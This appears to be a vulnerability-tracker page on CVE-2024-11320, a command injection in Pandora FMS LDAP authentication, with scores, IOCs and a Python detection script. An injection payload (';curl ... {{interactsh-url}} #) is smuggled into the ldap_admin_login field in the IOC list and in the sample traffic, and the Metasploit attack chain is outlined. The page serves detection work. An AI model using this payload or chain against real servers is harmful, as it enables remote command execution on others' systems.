CVE-2024-11320
published 2024-11-21

Priority: P189 · critical 9.8 (CVSS 3.1) · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available (Metasploit module, see below)
EPSS: 90.51% (99.8th percentile)
Arbitrary command execution on the server via a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS from version 700 through 777.4 (inclusive).

Affected (2 ranges)

Vendor       Product       Version range       Fixed in
pandora_fms  pandora_fms   700 – 777.4         (not stated)
pandorafms   pandora_fms   >= 700, < 777.5     777.5

Detection & IOCs (extracted from sources)

url      POST /index.php?login=1
url      GET /index.php?logged=1&sec=general/logon_ok
url      GET /index.php?sec=general&sec2=godmode/setup/setup&section=auth
url      POST /index.php?sec=general&sec2=godmode/setup/setup&section=auth
command  ldap_admin_login=';curl xxxxzz.{{interactsh-url}} #
path     /index.php?sec=general&sec2=godmode/setup/setup&section=auth
  • An exploit POST to /index.php?sec=general&sec2=godmode/setup/setup&section=auth with Content-Type application/x-www-form-urlencoded and shell metacharacters in the ldap_admin_login parameter (e.g. ';curl ...) indicates active exploitation of CVE-2024-11320.
  • A successful injection is acknowledged by the response string 'Correctly updated the setup options' after the malicious LDAP admin login value is submitted.
  • The attacker sets auth=ldap and fallback_local_auth=1 in the same setup POST body as part of the injection chain; alert when these two parameters appear together with shell metacharacters in ldap_admin_login.
  • The Metasploit module uses a default database password to create a new admin user in MySQL before exploiting the LDAP command injection; monitor for unexpected MySQL connections from external IPs and for new admin user creation in Pandora FMS.
  • The chain finishes with a GET to /index.php?login=1 (cookies disabled) after the payload has been stored; this triggers LDAP authentication and executes the injected command server-side. Correlate a poisoned setup POST with a login request from the same source shortly afterwards.
  • Sources report affected versions as Pandora FMS v7.0NG.718 through v7.0NG.777.4 (the NVD range above starts at 700); one of these versions combined with an exposed MySQL port and reachable admin web interface indicates high risk.
  • Exploitation requires admin-level access to the Pandora FMS web application, which the NVD v4.0 vector reflects (PR:H) while the v3.1 vector does not (PR:N). The Metasploit module obtains admin access via a default MySQL database password and a rogue admin account, so the MySQL port must be exposed for the fully automated chain to work remotely.
  • The injection point is specifically the ldap_admin_login field on the LDAP authentication configuration page; the vulnerable code path is only reached when LDAP authentication is configured or updated and then exercised by a login.
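The bullets above describe a two-request pattern: a setup POST that stores shell metacharacters in ldap_admin_login (typically together with auth=ldap and fallback_local_auth=1), followed by a GET to /index.php?login=1 from the same source that makes the server execute the stored value. The following detection logic is an added example written for this page, not code from Pandora FMS, the Metasploit module or the tracker. It assumes request bodies are available (a reverse proxy, WAF or ModSecurity audit log), because standard access logs do not record POST bodies; the record layout, the 300-second correlation window and the sample requests are constructed for the example.

```python
"""Detect the CVE-2024-11320 exploitation pattern in request records.

Added example (not from Pandora FMS or the tracker page). Assumes each record
is a dict {ts, src, method, path, body} with the URL-encoded POST body present.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Query string that identifies the LDAP authentication setup page (from the IOCs above).
SETUP_AUTH_QS = {"sec": "general", "sec2": "godmode/setup/setup", "section": "auth"}
# Assumed window between the poisoned setup POST and the login that fires it.
TRIGGER_WINDOW = 300
# Shell metacharacters that never belong in an LDAP admin DN.
SHELL_META = re.compile(r"[;|&`\n\r]|\$\(")


def _query(path):
    """Split a request target into its path and a flat dict of query parameters."""
    u = urlsplit(path)
    return u.path, {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}


def is_setup_auth_request(path):
    p, qs = _query(path)
    return p == "/index.php" and all(qs.get(k) == v for k, v in SETUP_AUTH_QS.items())


def is_login_trigger(path):
    p, qs = _query(path)
    return p == "/index.php" and qs.get("login") == "1"


def classify_post(body):
    """Return findings for one URL-encoded setup POST body."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    findings = []
    if SHELL_META.search(form.get("ldap_admin_login", "")):
        findings.append("shell metacharacters in ldap_admin_login")
    if form.get("auth") == "ldap" and form.get("fallback_local_auth") == "1":
        findings.append("auth=ldap with fallback_local_auth=1")
    return findings


def scan(records):
    """Correlate poisoned setup POSTs with the follow-up login that executes the payload.

    records must be sorted by ts. Each alert carries the source, the findings and
    'triggered', which becomes True when a /index.php?login=1 request from the same
    source follows the injection within TRIGGER_WINDOW seconds.
    """
    alerts, pending = [], {}
    for r in records:
        if r["method"] == "POST" and is_setup_auth_request(r["path"]):
            findings = classify_post(r.get("body", ""))
            if "shell metacharacters in ldap_admin_login" in findings:
                alert = {"src": r["src"], "ts": r["ts"], "findings": findings, "triggered": False}
                alerts.append(alert)
                pending[r["src"]] = alert
        elif r["method"] == "GET" and is_login_trigger(r["path"]):
            alert = pending.get(r["src"])
            if alert and r["ts"] - alert["ts"] <= TRIGGER_WINDOW:
                alert["triggered"] = True
    return alerts


SETUP_PATH = "/index.php?sec=general&sec2=godmode/setup/setup&section=auth"

# Constructed sample traffic: one legitimate LDAP configuration change, one injection
# using the payload shape from the IOCs, and two logins (attacker and unrelated user).
SAMPLE_REQUESTS = [
    {"ts": 0, "src": "10.0.0.5", "method": "POST", "path": SETUP_PATH,
     "body": urlencode({"auth": "ldap", "fallback_local_auth": "1",
                        "ldap_admin_login": "cn=admin,dc=example,dc=com"})},
    {"ts": 60, "src": "198.51.100.7", "method": "POST", "path": SETUP_PATH,
     "body": urlencode({"auth": "ldap", "fallback_local_auth": "1",
                        "ldap_admin_login": "';curl xxxxzz.{{interactsh-url}} #"})},
    {"ts": 65, "src": "198.51.100.7", "method": "GET", "path": "/index.php?login=1", "body": ""},
    {"ts": 70, "src": "10.0.0.9", "method": "GET", "path": "/index.php?login=1", "body": ""},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_REQUESTS):
        print(a)
```

The benign configuration change sets auth=ldap and fallback_local_auth=1 too, so those parameters alone must not alert; the shell metacharacters in ldap_admin_login are the discriminator, and the login correlation tells you whether the stored payload was actually fired.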

CVSS provenance

NVD  v3.1  9.8  CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD  v4.0  6.9  MEDIUM    CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:C/RE:M/U:Amber